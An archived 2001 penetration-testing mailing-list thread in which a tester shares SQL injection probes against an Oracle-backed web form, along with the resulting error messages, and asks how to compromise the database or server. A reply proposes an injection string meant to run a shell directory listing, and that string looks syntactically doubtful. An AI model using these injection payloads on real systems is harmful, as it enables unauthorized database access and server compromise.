Penetration Testing mailing list archives
Re: SQL INJECTION - ORACLE
From: "Michael Haunzwickl" <michael.haunzwickl () roehrer com>
Date: Mon, 10 Dec 2001 18:25:06 GMT
Hm ... I would try: Input: select * from ' & shell (Dir c:\) & ' sys.tab$ this will hopefully give you a dir of c:\ Best regards Der Schakal
Ursprüngliche Nachricht <<<<<<<<<<<<<<<<<<
Am 10.12.2001, 17:06:05, schrieb "foo bar" <badb0t () hotmail com> zum Thema SQL INJECTION - ORACLE:
Hello I am performing a vulnerability test against a web application and would like some advice. The application is running IIS 4.0 - all the remote exploits are patched. The backend is just a bunch of VB scripts, getting info from an oracle8 server on AIX.
Most of the places where input is accepted must strip out unexpected characters, but I located one field on a form where input was not
properly
validated. I've tried posting different strings into the field with
limited
success. All I'm able to get is errors back. I'd like to take advantage
of
some stored procedures in oracle. Could you look at the log of my
activity
below and provide advice on where to go next in order to compromise the database, or the server itself? I'd even be happy with the ability to
run a
successful query through injection. It looks like their using a package
or
stored procedure to post the query, and I'm having trouble breaking out
of
it. Is it possible, if so, how should I go about it?
Input: ' Result: Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-00907: missing right parenthesis
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
Input: ') Result: Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-00923: FROM keyword not
found
where expected
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
Input: ') from Result: Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-00903: invalid table name
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
Input: ') from policy Result: Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-00933: SQL command not properly ended
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
Input: ') from policy -- "'" Result: Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-06553: PLS-306: wrong
number
or types of arguments in call to 'GETPOLICYNUMBER'
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
Input: ') from getpolicynumber -- "'" Result: Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-04044: procedure,
function,
package, or type is not allowed here
E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128
_________________________________________________________________ Get your FREE download of MSN Explorer at
http://explorer.msn.com/intl.asp ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- SQL INJECTION - ORACLE foo bar (Dec 10)
- Re: SQL INJECTION - ORACLE Michael Haunzwickl (Dec 10)
- CFM SQL injection Charlie Liserne (Dec 17)
- Re: CFM SQL injection Kevin Spett (Dec 19)
- Re: CFM SQL injection Charlie Liserne (Dec 24)
- CFM SQL injection Charlie Liserne (Dec 17)
- Re: SQL INJECTION - ORACLE Michael Haunzwickl (Dec 10)
- Re: SQL INJECTION - ORACLE Kevin Spett (Dec 10)